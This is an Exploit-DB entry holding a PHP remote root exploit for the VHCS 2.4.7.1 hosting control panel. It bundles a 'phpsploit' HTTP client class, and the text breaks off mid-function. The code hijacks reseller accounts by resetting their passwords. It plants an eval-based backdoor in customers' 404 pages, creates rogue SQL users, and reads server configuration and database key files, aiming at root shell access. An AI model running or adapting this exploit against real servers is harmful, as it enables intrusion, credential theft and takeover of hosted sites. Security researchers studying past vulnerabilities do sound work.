VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Code Execution

EDB-ID:

5224

CVE:

N/A


Author:

DarkFig

Type:

remote


Platform:

Linux

Date:

2008-03-09


#!/usr/bin/php -q
<?php
error_reporting(E_ALL ^ E_NOTICE);
#
#
# darkfig@darky:/# ./vhcs_sploit.php -url http://localhost/vhcs2/
#
#  VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
#  --------------------------------------------------
# 
# About:
#  by DarkFig < gmdarkfig (at) gmail (dot) com >
#  http://acid-root.new.fr/
#  #acidroot@irc.worldnet.net
# 
# Exploit:
#  + Logged in (Administrator)
#  + The administrator has 2 resellers
#  / Changing dareseller's password
#  / Trying to connect as dareseller:thatpwnz
#  + Login successful
#  + The reseller has 2 users
#  + Host domaintest.fr is connected
#  / Trying to write PHP code
#  + PHP code successfully written
#  / We'll have to bypass open_basedir cause safe_mode=On
#  - User  doesn't have SQL rights
#  / Host domaintest.fr isn't a valid user
#  + Host xpliamaclient.com is connected
#  / Trying to write PHP code
#  + PHP code successfully written
#  / We'll have to bypass open_basedir cause safe_mode=On
#  - User  doesn't have SQL rights
#  / Host xpliamaclient.com isn't a valid user
#  / Changing unautresel's password
#  / Trying to connect as unautresel:thatpwnz
#  + Login successful
#  + The reseller has 1 users
#  + Host thegoodone.com is connected
#  / Trying to write PHP code
#  + PHP code successfully written
#  / We'll have to bypass open_basedir cause safe_mode=On
#  / Trying to create a database
#  + Database 92xpl_db39 successfully created
#  + Using database id 12
#  / Trying to add SQL user
#  + User 93xpl_usr2 successfully created
#  + Using SQL user id 17
#  + Host thegoodone.com is a valid user
#  + Logged in (thegoodone.com - Client)
#  / Trying to load files via local_infile
#  + Ok: /etc/vhcs2/vhcs2.conf
#  + Ok: /var/www/vhcs2/gui/include/vhcs2-db-keys.php
#  + Now you can execute commands as root =]
#  + root@thegoodone.com: id
# 
# uid=0(root) gid=0(root)
#

##############################################
# THE VHCS CODE IS AFTER THE PHPSPLOIT CLASS
##############################################


/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
 * GNU General Public License for more details. 
 * 
 * You should have received a copy of the GNU General Public License 
 * along with this program; if not, write to the Free Software 
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
 * 
 * TITLE:          PhpSploit Class
 * REQUIREMENTS:   PHP 4 / PHP 5
 * VERSION:        2.0
 * LICENSE:        GNU General Public License
 * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
 * FILENAME:       phpsploitclass.php
 *
 * CONTACT:        gmdarkfig@gmail.com (french / english)
 * GREETZ:         Sparah, Ddx39
 *
 * DESCRIPTION:
 * The phpsploit is a class implementing a web user agent.
 * You can add cookies, headers, use a proxy server with (or without) a
 * basic authentification. It supports the GET and the POST method. It can
 * also be used like a browser with the cookiejar() function (which allow
 * a server to add several cookies for the next requests) and the
 * allowredirection() function (which allow the script to follow all
 * redirections sent by the server). It can return the content (or the
 * headers) of the request. Others useful functions can be used for debugging.
 * A manual is actually in development but to know how to use it, you can
 * read the comments.
 *
 * CHANGELOG:
 *
 * [2007-06-10] (2.0)
 *  * Code: Code optimization
 *  * New: Compatible with PHP 4 by default
 *
 * [2007-01-24] (1.2)
 *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
 *  * New: multipart/form-data enctype is now supported 
 *
 * [2006-12-31] (1.1)
 *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
 *  * New: You can now call the getheader() / getcontent() function without parameters
 *
 * [2006-12-30] (1.0)
 *  * First version
 * 
 */

class phpsploit
{
	var $proxyhost;
	var $proxyport;
	var $host;
	var $path;
	var $port;
	var $method;
	var $url;
	var $packet;
	var $proxyuser;
	var $proxypass;
	var $header;
	var $cookie;
	var $data;
	var $boundary;
	var $allowredirection;
	var $last_redirection;
	var $cookiejar;
	var $recv;
	var $cookie_str;
	var $header_str;
	var $server_content;
	var $server_header;
	

	/**
	 * This function is called by the
	 * get()/post()/formdata() functions.
	 * You don't have to call it, this is
	 * the main function.
	 *
	 * @access private
	 * @return string $this->recv ServerResponse
	 * 
	 */
	function sock()
	{
		if(!empty($this->proxyhost) && !empty($this->proxyport))
		   $socket = @fsockopen($this->proxyhost,$this->proxyport);
		else
		   $socket = @fsockopen($this->host,$this->port);
		
		if(!$socket)
		   die("Error: Host seems down");
		
		if($this->method=='get')
		   $this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
		   
		elseif($this->method=='post' or $this->method=='formdata')
		   $this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
		   
		else
		   die("Error: Invalid method");
		
		if(!empty($this->proxyuser))
		   $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
		
		if(!empty($this->header))
		   $this->packet .= $this->showheader();
		   
		if(!empty($this->cookie))
		   $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
	
		$this->packet .= 'Host: '.$this->host."\r\n";
		$this->packet .= "Connection: Close\r\n";
		
		if($this->method=='post')
		{
			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
			$this->packet .= $this->data."\r\n";
		}
		elseif($this->method=='formdata')
		{
			$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
			$this->packet .= $this->data;
		}

		$this->packet .= "\r\n";
		$this->recv = '';

		fputs($socket,$this->packet);

		while(!feof($socket))
		   $this->recv .= fgets($socket);

		fclose($socket);

		if($this->cookiejar)
		   $this->getcookie();

		if($this->allowredirection)
		   return $this->getredirection();
		else
		   return $this->recv;
	}
	

	/**
	 * This function allows you to add several
	 * cookies in the request.
	 * 
	 * @access  public
	 * @param   string cookn CookieName
	 * @param   string cookv CookieValue
	 * @example $this->addcookie('name','value')
	 * 
	 */
	function addcookie($cookn,$cookv)
	{
		if(!isset($this->cookie))
		   $this->cookie = array();

		$this->cookie[$cookn] = $cookv;
	}


	/**
	 * This function allows you to add several
	 * headers in the request.
	 *
	 * @access  public
	 * @param   string headern HeaderName
	 * @param   string headervalue Headervalue
	 * @example $this->addheader('Client-IP', '128.5.2.3')
	 * 
	 */
	function addheader($headern,$headervalue)
	{
		if(!isset($this->header))
		   $this->header = array();
		   
		$this->header[$headern] = $headervalue;
	}


	/**
	 * This function allows you to use an
	 * http proxy server. Several methods
	 * are supported.
	 * 
	 * @access  public
	 * @param   string proxy ProxyHost
	 * @param   integer proxyp ProxyPort
	 * @example $this->proxy('localhost',8118)
	 * @example $this->proxy('localhost:8118')
	 * 
	 */
	function proxy($proxy,$proxyp='')
	{
		if(empty($proxyp))
		{
			$proxarr = explode(':',$proxy);
			$this->proxyhost = $proxarr[0];
			$this->proxyport = (int)$proxarr[1];
		}
		else 
		{
			$this->proxyhost = $proxy;
			$this->proxyport = (int)$proxyp;
		}

		if($this->proxyport > 65535)
		   die("Error: Invalid port number");
	}
	

	/**
	 * This function allows you to use an
	 * http proxy server which requires a
	 * basic authentification. Several
	 * methods are supported:
	 *
	 * @access  public
	 * @param   string proxyauth ProxyUser
	 * @param   string proxypass ProxyPass
	 * @example $this->proxyauth('user','pwd')
	 * @example $this->proxyauth('user:pwd');
	 * 
	 */
	function proxyauth($proxyauth,$proxypass='')
	{
		if(empty($proxypass))
		{
			$posvirg = strpos($proxyauth,':');
			$this->proxyuser = substr($proxyauth,0,$posvirg);
			$this->proxypass = substr($proxyauth,$posvirg+1);
		}
		else
		{
			$this->proxyuser = $proxyauth;
			$this->proxypass = $proxypass;
		}
	}


	/**
	 * This function allows you to set
	 * the 'User-Agent' header.
	 * 
	 * @access  public
	 * @param   string useragent Agent
	 * @example $this->agent('Firefox')
	 * 
	 */
	function agent($useragent)
	{
		$this->addheader('User-Agent',$useragent);
	}

	
	/**
	 * This function returns the headers
	 * which will be in the next request.
	 * 
	 * @access  public
	 * @return  string $this->header_str Headers
	 * @example $this->showheader()
	 * 
	 */
	function showheader()
	{
		$this->header_str = '';
		
		if(!isset($this->header))
		   return;
		   
		foreach($this->header as $name => $value)
		   $this->header_str .= $name.': '.$value."\r\n";
		   
		return $this->header_str;
	}

	
	/**
	 * This function returns the cookies
	 * which will be in the next request.
	 * 
	 * @access  public
	 * @return  string $this->cookie_str Cookies
	 * @example $this->showcookie()
	 * 
	 */
	function showcookie()
	{
		$this->cookie_str = '';
		
		if(!isset($this->cookie))
		   return;
		
		foreach($this->cookie as $name => $value)
		   $this->cookie_str .= $name.'='.$value.'; ';

		return $this->cookie_str;
	}


	/**
	 * This function returns the last
	 * formed http request.
	 * 
	 * @access  public
	 * @return  string $this->packet HttpPacket
	 * @example $this->showlastrequest()
	 * 
	 */
	function showlastrequest()
	{
		if(!isset($this->packet))
		   return;
		else
		   return $this->packet;
	}


	/**
	 * This function sends the formed
	 * http packet with the GET method.
	 * 
	 * @access  public
	 * @param   string url Url
	 * @return  string $this->sock()
	 * @example $this->get('localhost/index.php?var=x')
	 * @example $this->get('http://localhost:88/tst.php')
	 * 
	 */
	function get($url)
	{
		$this->target($url);
		$this->method = 'get';
		return $this->sock();
	}

	
	/**
	 * This function sends the formed
	 * http packet with the POST method.
	 *
	 * @access  public
	 * @param   string url  Url
	 * @param   string data PostData
	 * @return  string $this->sock()
	 * @example $this->post('http://localhost/','helo=x')
	 * 
	 */	
	function post($url,$data)
	{
		$this->target($url);
		$this->method = 'post';
		$this->data = $data;
		return $this->sock();
	}
	

	/**
	 * This function sends the formed http
	 * packet with the POST method using
	 * the multipart/form-data enctype.
	 * 
	 * @access  public
	 * @param   array array FormDataArray
	 * @return  string $this->sock()
	 * @example $formdata = array(
	 *                      frmdt_url => 'http://localhost/upload.php',
	 *                      frmdt_boundary => '123456', # Optional
	 *                      'var' => 'example',
	 *                      'file' => array(
	 *                                frmdt_type => 'image/gif',  # Optional
	 *                                frmdt_transfert => 'binary' # Optional
	 *                                frmdt_filename => 'hello.php,
	 *                                frmdt_content => '<?php echo 1; ?>'));
	 *          $this->formdata($formdata);
	 * 
	 */
	function formdata($array)
	{
		$this->target($array[frmdt_url]);
		$this->method = 'formdata';
		$this->data = '';
		
		if(!isset($array[frmdt_boundary]))
		   $this->boundary = 'phpsploit';
		else
		   $this->boundary = $array[frmdt_boundary];

		foreach($array as $key => $value)
		{
			if(!preg_match('#^frmdt_(boundary|url)#',$key))
			{
				$this->data .= str_repeat('-',29).$this->boundary."\r\n";
				$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
				
				if(!is_array($value))
				{
					$this->data .= "\r\n\r\n".$value."\r\n";
				}
				else
				{
					$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";

					if(isset($array[$key][frmdt_type]))
					   $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";

					if(isset($array[$key][frmdt_transfert]))
					   $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";

					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
				}
			}
		}

		$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
		return $this->sock();
	}

	
	/**
	 * This function returns the content
	 * of the server response, without
	 * the headers.
	 * 
	 * @access  public
	 * @param   string code ServerResponse
	 * @return  string $this->server_content
	 * @example $this->getcontent()
	 * @example $this->getcontent($this->get('http://localhost/'))
	 * 
	 */
	function getcontent($code='')
	{
		if(empty($code))
		   $code = $this->recv;

		$code = explode("\r\n\r\n",$code);
		$this->server_content = '';
		
		for($i=1;$i<count($code);$i++)
		   $this->server_content .= $code[$i];

		return $this->server_content;
	}

	
	/**
	 * This function returns the headers
	 * of the server response, without
	 * the content.
	 * 
	 * @access  public
	 * @param   string code ServerResponse
	 * @return  string $this->server_header
	 * @example $this->getcontent()
	 * @example $this->getcontent($this->post('http://localhost/','1=2'))
	 * 
	 */
	function getheader($code='')
	{
		if(empty($code))
		   $code = $this->recv;

		$code = explode("\r\n\r\n",$code);
		$this->server_header = $code[0];
		
		return $this->server_header;
	}

	
	/**
	 * This function is called by the
	 * cookiejar() function. It adds the
	 * value of the "Set-Cookie" header
	 * in the "Cookie" header for the
	 * next request. You don't have to
	 * call it.
	 * 
	 * @access private
	 * @param  string code ServerResponse
	 * 
	 */
	function getcookie()
	{
		foreach(explode("\r\n",$this->getheader()) as $header)
		{
			if(preg_match('/set-cookie/i',$header))
			{
				$fequal = strpos($header,'=');
				$fvirgu = strpos($header,';');
				
				// 12=strlen('set-cookie: ')
				$cname  = substr($header,12,$fequal-12);
				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
				
				$this->cookie[trim($cname)] = trim($cvalu);
			}
		}
	}


	/**
	 * This function is called by the
	 * get()/post() functions. You
	 * don't have to call it.
	 *
	 * @access  private
	 * @param   string urltarg Url
	 * @example $this->target('http://localhost/')
	 * 
	 */
	function target($urltarg)
	{
		if(!ereg('^http://',$urltarg))
		   $urltarg = 'http://'.$urltarg;
		   
		$urlarr     = parse_url($urltarg);
		$this->url  = 'http://'.$urlarr['host'].$urlarr['path'];
		
		if(isset($urlarr['query']))
		   $this->url .= '?'.$urlarr['query'];
		
		$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
		$this->host = $urlarr['host'];
		
		if($this->port != '80')
		   $this->host .= ':'.$this->port;

		if(!isset($urlarr['path']) or empty($urlarr['path']))
		   die("Error: No path precised");

		$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);

		if($this->port > 65535)
		   die("Error: Invalid port number");
	}
	
	
	/**
	 * If you call this function,
	 * the script will extract all
	 * 'Set-Cookie' headers values
	 * and it will automatically add
	 * them into the 'Cookie' header
	 * for all next requests.
	 *
	 * @access  public
	 * @param   integer code 1(enabled) 0(disabled)
	 * @example $this->cookiejar(0)
	 * @example $this->cookiejar(1)
	 * 
	 */
	function cookiejar($code)
	{
		if($code=='0')
		   $this->cookiejar=FALSE;

		elseif($code=='1')
		   $this->cookiejar=TRUE;
	}


	/**
	 * If you call this function,
	 * the script will follow all
	 * redirections sent by the server.
	 * 
	 * @access  public
	 * @param   integer code 1(enabled) 0(disabled)
	 * @example $this->allowredirection(0)
	 * @example $this->allowredirection(1)
	 * 
	 */
	function allowredirection($code)
	{
		if($code=='0')
		   $this->allowredirection=FALSE;
		   
		elseif($code=='1')
		   $this->allowredirection=TRUE;
	}

	
	/**
	 * This function is called if
	 * allowredirection() is enabled.
	 * You don't have to call it.
	 *
	 * @access private
	 * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
	 * @return string $this->get($this->last_redirection)
	 * @return string $this->recv;
	 * 
	 */
	function getredirection()
	{
		if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
		{
			$this->last_redirection = trim($codearr[2]);
			
			if(!ereg('://',$this->last_redirection))
			   return $this->get('http://'.$this->host.$this->path.$this->last_redirection);

			else
			   return $this->get($this->last_redirection);
		}
		else
		   return $this->recv;
	}


	/**
	 * This function allows you
	 * to reset some parameters.
	 * 
	 * @access  public
	 * @param   string func Param
	 * @example $this->reset('header')
	 * @example $this->reset('cookie')
	 * @example $this->reset()
	 * 
	 */
	function reset($func='')
	{
		switch($func)
		{
			case 'header':
			$this->header = array('');
			break;
				
			case 'cookie':
			$this->cookie = array('');
			break;
				
			default:
			$this->cookiejar = '';
			$this->header = array('');
			$this->cookie = array('');
			$this->allowredirection = '';
			break;
		}
	}
}


class vhcs_xpl extends phpsploit
{
	var $sleep_time = 4;

	#  -rw-r--r-- 1 root root
	var $conf_path = '/etc/vhcs2/vhcs2.conf';

	# -r-------- 1 www-data www-data
	var $keys_path = '/var/www/vhcs2/gui/include/vhcs2-db-keys.php';

	var $head_arr = array(
            'admin/index.php'       => 3,
	    'reseller/index.php'    => 2,
	    '../reseller/index.php' => 2,
	    'client/index.php'      => 1,
	    ''	                    => 0);

	var $privileges = array(
	    3 => 'Administrator',
	    2 => 'Reseller',
	    1 => 'Client');

	var $reg_arr = array(
            1 => '#edit_reseller\.php\?edit_id=([0-9]+)" class="link">(.*) </a> </td>#i',
	    2 => '#edit_user.php\?edit_id=([0-9]+)" class="link">(.*)</a></td>#i',
	    3 => '#delete_sql_database\.php\?id=([0-9]+)#i',
	    4 => '#delete_sql_database\.php\?id=([0-9]+)#i',
	    5 => '#sql_execute_query.php\?id=([0-9]+)#i');

	var $flags = array(
	   -1 => '-',
	    0 => '/',
	    1 => '+');

	function main()
	{
		$this->agent('Mozilla Firefox');
		$this->cookiejar(1);

		$this->mhead();

		$this->uri      = $this->getparam('url', TRUE);
		$this->url_arr  = parse_url($this->uri);

		$this->patch = $this->getparam('patch');
		$this->proxh = $this->getparam('proxhost');
		$this->proxa = $this->getparam('proxauth');

		if($this->proxh)
		   $this->proxy($this->proxh);

		if($this->proxa)
		   $this->proxyauth($this->proxa);

		print "\nExploit:";
		$this->type = $this->login();

		if(empty($this->type))
		{
			if(!$this->patch)
			{
				$this->msg('A patch has been applied to this website', -1);
				$this->msg("See RoMaNSoFt's advisory for more details", -1);
				$this->msg('Try with the -patch option', -1, 1);
			}
			else
			   $this->msg('Bad username/password', -1, 1);
		}

		$this->msg("Logged in (".$this->usr.' - '.$this->privileges[$this->type].')', 1);

		$this->allowredirection(1);

		$this->get_vhcs_conf();

		$this->exec_cmd();

		return;
	}


	function getparam($param, $nec=FALSE)
	{
		global $argv;

		foreach($argv as $value => $key)
		{
			if($key === '-'.$param)
			   return $argv[$value+1];
		}

		if($nec)
		   $this->usage();
		
		return FALSE;
	}

	function mhead()
	{
		print "\n VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit";
		print "\n --------------------------------------------------\n";
		print "\nAbout:";
		print "\n by DarkFig < gmdarkfig (at) gmail (dot) com >";
		print "\n http://acid-root.new.fr/";
		print "\n #acidroot@irc.worldnet.net";
		print "\n";
	
		return;
	}
	
	function usage()
	{
		print "\nUsage:";
		print "\n vhcsxpl.php -url <url> [options...]\n";
		print "\nOptions:";
		print "\n -patch <user:pwd>     Unofficial patch applied";
		print "\n -proxhost <ip>        If you wanna use a proxy";
		print "\n -proxauth <usr:pwd>   Proxy with authentication\n";
		print "\n";
	
		exit(1);
	}

	function log_as()
	{
		$this->msg("Trying to connect as ".$this->usr.':'.$this->pwd, 0);
		$this->allowredirection(1);

		$this->post($this->uri.'chk_login.php',
		'uname='.$this->usr.'&upass='.$this->pwd.'&Submit=+++Login+++');

		$this->redir_type = $this->get_type_by_redir();

		if($this->redir_type == 0)
		   $this->msg('Login attempt failed', -1);

		else
		   $this->msg('Login successful', 1);

		return $this->redir_type;
	}

	function get_type_by_redir()
	{
		$this->redir_arr = parse_url($this->last_redirection);
			
		$this->allowredirection(0);

		return $this->head_arr[$this->redir_arr['path']];
	}
	
	function login()
	{
		if($this->patch)
		{
			$this->idents = explode(':', $this->patch);
			list($this->usr, $this->pwd) =	$this->idents;

			$this->type = $this->log_as();

			return $this->log_as_user();
		}
		else
		{
			$this->get($this->uri.'admin/manage_users.php');

			$this->type = 3;

			if(ereg('add_user\.php', $this->getcontent()))
			   return $this->log_as_user();

			else
			   return 0;
		}
	}

	function log_as_user()
	{
		if($this->type == 3)
		   $this->logged_as_admin();

		if($this->type == 2)
		   $this->logged_as_reseller();

		if($this->type == 1)
		{
			if(!$this->patch)
			   return 1;

			else
			   return $this->valid_user();
		}

		else
		   return 0;
	}

	function valid_user()
	{
		if($this->write_code())
		{
			# open_basedir + safe_mode
			if($this->is_safe())
			{
				if($this->bypass_with_db())
				   return 1;

				else
				   return 0;
			}
			else
			   return 1;
		}
		return 0;		
	}

	function logged_as_admin()
	{
		$this->msg('Logged in ('.$this->privileges[3].')', 1);

		$this->get($this->uri.'admin/manage_users.php');

		preg_match_all($this->reg_arr[1], $this->getcontent(), $resellers);

		$this->reseller_count = count($resellers[1]);

		$this->msg('The administrator has '.$this->reseller_count.' resellers', 1);

		for($i=0; $i<$this->reseller_count; $i++)
		{	
			$this->usr = $resellers[2][$i];
			$this->pwd = 'thatpwnz';

			if(!$this->patch)
		   	{
				$this->msg('Changing '.$resellers[2][$i]."'s password", 0);

				$this->reseller_dat = '';

				$this->get($this->uri.'admin/edit_reseller.php?edit_id='.$resellers[1][$i]);

				# only checked ip
				preg_match_all('#name="ip_([0-9]+)" value="asgned" checked#i',
				$this->getcontent(), $reseller_ips);

				$this->ip_count = count($reseller_ips[1]);
				$this->ip_dat = '';

				for($j=0; $j<$this->ip_count; $j++)
				{
					$this->ip_dat .= 'ip_'.$reseller_ips[1][$j].'=asgned';

		   	 		if($j != $this->ip_count-1)
		  	    		   $this->ip_dat .= '&';
				}

				# Change reseller's password/mail
				# This is needed if it was run without -path
				# Because we can't click on the 'Change' button.
				#
				# pwd: thatpwnz
				# mail: <reseller_name>@ohyeah.com
				#
				$this->post($this->uri.'admin/edit_reseller.php',
				'username='.$resellers[2][$i].'&pass=thatpwnz&'.
				'pass_rep=thatpwnz&email='.$resellers[2][$i].''.
				'%40ohyeah.com&nreseller_max_domain_cnt=0&nres'.
				'eller_max_subdomain_cnt=0&nreseller_max_alias'.
				'_cnt=0&nreseller_max_mail_cnt=0&nreseller_max'.
				'_ftp_cnt=0&nreseller_max_sql_db_cnt=0&nresell'.
				'er_max_sql_user_cnt=0&nreseller_max_traffic=0'.
				'&nreseller_max_disk=0&'.$this->ip_dat.'&custo'.
				'mer_id=&fname=&lname=&firm=&zip=&city=&countr'.
				'y=&street1=&street2=&phone=&fax=&Submit=++Upd'.
				'ate++&uaction=update_reseller&edit_id='.
				$resellers[1][$i].'&edit_username='.
				$resellers[2][$i]);

				if($this->log_as() != 2)
				   return 0;
			}
			else
			{
				$this->allowredirection(1);

				$this->get($this->uri.'admin/change_user_interface.php?to_id='.$resellers[1][$i]);

				if($this->get_type_by_redir() != 2)
				   return 0;
			}

			if($this->logged_as_reseller())
			   return 1;

			$this->reset('cookie');
			$this->get($this->uri.'reseller/change_user_interface.php?action=go_back');
		}

		return 0;
	}

	function logged_as_reseller()
	{
		$this->get($this->uri.'reseller/users.php');

		preg_match_all($this->reg_arr[2], $this->getcontent(), $users);
		
		array_walk($users[2], 'trim');
		
		$this->user_count = count($users[1]);
		
		$this->msg('The reseller has '.$this->user_count. ' users', 1);

		$this->patch = FALSE;

		for($i=0; $i<$this->user_count; $i++)
		{
			if($this->is_alive($users[2][$i]))
			{
				$this->usr = $users[2][$i];

				$this->type = 1;

				$this->msg('Host '.$this->usr.' is connected', 1);

				$this->get($this->uri.'reseller/change_user_interface.php?to_id='.$users[1][$i]);

				if($this->valid_user())
				{
					$this->msg('Host '.$this->usr.' is a valid user', 1);
					return TRUE;
				}
				else
				   $this->msg("Host ".$this->usr." isn't a valid user", 0);
			}
			else
			   $this->msg('Host '.$users[2][$i].' seems down', -1);

			$this->get($this->uri.'client/change_user_interface.php?action=go_back');
		}

		return FALSE;
	}

	function bypass_with_db()
	{
		$this->get($this->dmn_vhcs_url.'client/index.php');

		if(!ereg('manage_sql.php', $this->getcontent()) and !$edit)
		{
			$this->msg("User ".$this->ur." doesn't have SQL rights", -1);

			return FALSE;
		}
		
		# No database
		if(!$this->got_db())
		{
			$this->msg('Trying to create a database', 0);

			$this->tmp_db_name = rand(0,100).'xpl_db'.rand(0,100);

			# Database: ..xpl_db..
			$this->post($this->dmn_vhcs_url.'client/add_sql_database.php',
			'db_name='.$this->tmp_db_name.'&id_pos=start&Submit=++Add++&'.
			'uaction=add_db');

			if($this->got_db())
			   $this->msg('Database '.$this->tmp_db_name.' successfully created', 1);

			else
			{
				$this->msg("Can't create the database ".$this->tmp_db_name, 0);

				return FALSE;
			}
		}

		# First database
		$this->db_id = $this->sql_db_ids[1];

		$this->msg('Using database id '.$this->db_id, 1);

		if(!$this->got_db_user())
		{
			$this->msg('Trying to add SQL user', 0);

			$this->tmp_db_user = rand(0,100).'xpl_usr'.rand(0,100);
			
			# SQL user: ..xpl_usr..:xpl_pwd
			$this->post($this->dmn_vhcs_url.'client/sql_add_user.php',
			'user_name='.$this->tmp_db_user.'&id_pos=end&pass=xpl_pw'.
			'd&pass_rep=xpl_pwd&Add_New=++Add++&uaction=add_user&id='.
			$this->db_id);

			if($this->got_db_user())
			   $this->msg('User '.$this->tmp_db_user.' successfully created', 1);

			else
			{
				$this->msg("Can't create the SQL user ".$this->tmp_db_user, 0);

				return FALSE;
			}
		}

		# First SQL user id associed with the database
		$this->db_user_id = $this->sql_usrs[1];

		$this->msg('Using SQL user id '.$this->db_user_id, 1);

		return TRUE;
	}

	function got_db_user()
	{		
		$this->get($this->dmn_vhcs_url.'client/manage_sql.php');

		$this->content_arr = explode("\n", $this->getcontent());

		$this->is_sql_db_usr = FALSE;

		for($i=0; $i<count($this->content_arr); $i++)
		{
			if(preg_match($this->reg_arr[4],
			$this->content_arr[$i], $this->sql_db_id))
			{
				if($this->sql_db_id[1] == $this->db_id)
				   $this->is_sql_db_usr = TRUE;

				else
				   $this->is_sql_db_usr = FALSE;
			}

			if(preg_match($this->reg_arr[5],
			$this->content_arr[$i], $this->sql_usrs))
			{
				if($this->is_sql_db_usr)
				   return TRUE;
			}
		}
		return FALSE;
	}

	function got_db()
	{	
		$this->get($this->dmn_vhcs_url.'client/manage_sql.php');

		preg_match($this->reg_arr[3],
		$this->getcontent(), $this->sql_db_ids);

		if(empty($this->sql_db_ids))
		   return FALSE;

		else
		   return TRUE;
	}

	function is_alive($domain_name)
	{
		if(gethostbyname($domain_name) != $domain_name)
		   return TRUE;

		else
		   return FALSE;
	}

	function write_code()
	{
		$this->msg('Trying to write PHP code', 0);

		$this->dmn_url      = 'http://'.$this->usr;
		$this->dmn_vhcs_url = $this->dmn_url.$this->url_arr['path'];

		$this->get($this->dmn_url.'/errors/404/index.php');
		$this->old_404 = $this->getcontent();

		$this->phpc =
		 '<?php '
		.'error_reporting(0); '
		.'if(isset($_SERVER[\'HTTP_SHELL\'])) '
		.'{ eval(base64_decode($_SERVER[\'HTTP_SHELL\'])); exit(0); } '
		.'?>';

		$this->new_404 = $this->phpc.$this->old_404;

		$this->post($this->dmn_vhcs_url.'client/error_pages.php',
		'error='.urlencode($this->new_404).'&uaction=updt_error&eid=404&Submit=+Save+');

		$this->exec_php('print "itworkz";');

		if(ereg('itworkz', $this->getcontent()))
		{
			$this->msg('PHP code successfully written', 1);

			return TRUE;
		}
		else
		{
			$this->msg("Can't write PHP code", -1);

		   	return FALSE;
		}
	}

	function get_vhcs_conf()
	{
		if($this->safe_mode)
		   $this->msg('Trying to load files via local_infile', 0);

		else
		   $this->msg('Trying to load files via shell_exec', 0);

		$this->lf_conf   = $this->path_content($this->conf_path);
		$this->lf_conf   = trim($this->lf_conf, "\r");

		$this->vhcs_conf = explode("\n", $this->lf_conf);

		$this->conf = array();

		foreach($this->vhcs_conf as $this->conf_line)
		{
			# comment
			if(!ereg('^(\s*)#', $this->conf_line))
			{
				$this->pos   = strpos($this->conf_line, '=');
				$this->name  = strtoupper(trim(substr($this->conf_line, 0, $this->pos)));
				$this->value = trim(substr($this->conf_line, $this->pos+1));

				$this->conf[$this->name] = $this->value;
			}
		}

		$this->php_keys_code = $this->path_content($this->keys_path);

		return;
	}

	function path_content($path)
	{
		# open_basedir On/off
		# safe_mode = Off
		if(!$this->safe_mode)
		{
			$this->phpc = 'print shell_exec("cat '.$path.'");';

			$this->exec_php($this->phpc);

			$this->file_content = $this->getcontent();

		}

		# open_basedir On/Off
		# safe_mode = On
		else
		{
			$this->rand_table = rand().'tmp_hax'.rand();

			$this->sql_query =
			"CREATE TABLE ".$this->rand_table." (content text not null); ".
			"LOAD DATA LOCAL INFILE '$path' INTO TABLE ".$this->rand_table.
			" FIELDS TERMINATED BY '__EOF__' ESCAPED BY '' LINES TERMINAT".
			"ED BY '__EOF__'; SELECT CONCAT(CHAR(80,87,78,69,68,67,79,78,".
			"84,69,78,84),HEX(content),CHAR(80,87,78,69,68,67,79,78,84,69".
			",78,84)) FROM ".$this->rand_table."; DROP TABLE ".
			$this->rand_table;

			$this->sql_arr = explode(';', $this->sql_query);
			$this->sql_cnt = count($this->sql_arr);

			for($i=0; $i<$this->sql_cnt; $i++)
			{
				$this->sql_res = $this->exec_sql($this->sql_arr[$i]);

				if($i == $this->sql_cnt-2)
				   $this->file_content = $this->sql_res;
			}
			
		}

		if(!$this->file_content)
		{
			$this->msg("A problem occurred while trying to read the file $path", -1);
			
			if($this->safe_mode)
			   $this->msg("local_infile=Off or we don't have sufficient access rights to the file", -1, 2);

			else
			   $this->msg("We don't have sufficient access rights to the file", -1, -2);
		}
		else
		   $this->msg("Ok: $path", 1);

		return $this->file_content;
	}

	function exec_sql($query)
	{
		$this->post($this->dmn_vhcs_url.'client/sql_execute_query.php',
		'user_name=&sql_query='.$query.'&Submit=+Execute+&uaction=exe'.
		'cute_query&id='.$this->db_user_id);

		$this->sql_result = '';

		if(ereg('PWNEDCONTENT', $this->getcontent()))
		{
			$this->sql_res_arr = explode('PWNEDCONTENT', $this->getcontent());

			$this->sql_result  = pack('H*', $this->sql_res_arr[1]);
		}
	
		return $this->sql_result;
	}

	function is_safe()
	{
		$this->phpc =
		'if(in_array(strtoupper(ini_get("safe_mode")),array("ON","1")) '
	       .'or !function_exists("shell_exec")) '
	       .'{ print "safe_mode=on"; }';

		$this->exec_php($this->phpc);

